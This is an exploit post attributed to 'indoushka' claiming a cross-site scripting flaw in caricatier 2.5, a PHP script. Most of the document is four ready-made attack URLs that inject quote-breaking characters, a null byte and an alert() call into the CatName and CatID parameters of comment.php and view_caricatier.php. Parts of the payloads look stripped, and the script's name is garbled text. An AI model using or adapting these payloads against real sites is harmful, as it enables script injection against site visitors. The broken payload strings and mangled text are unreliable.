======================================================================================== | # Title : caricatier 2.5 Cross Site Scripting Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : ÈÇÓÊÎÏÇã ÓßÑíÈÊ ÇáßÇÑíßÇÊíÑ ÇáÇÕÏÇÑ : Version 2.5 /http://www.php-ar.com/| | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1- http://server/caricatier/comment.php?op=CatID%3D0&CatName=1alert(213771818860)%3B&CaricatierID=1 | 2- http://server/caricatier/comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1 | 3- http://server/caricatier/view_caricatier.php?op=open&CatID=1%00"'>alert(213771818860)%3B&CaricatierID=1&CatName=indoushka@hotmail.com-00213771818860 | 4- http://server/caricatier/view_caricatier.php?op=open&CatID=0&CaricatierID=1&CatName=1 | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------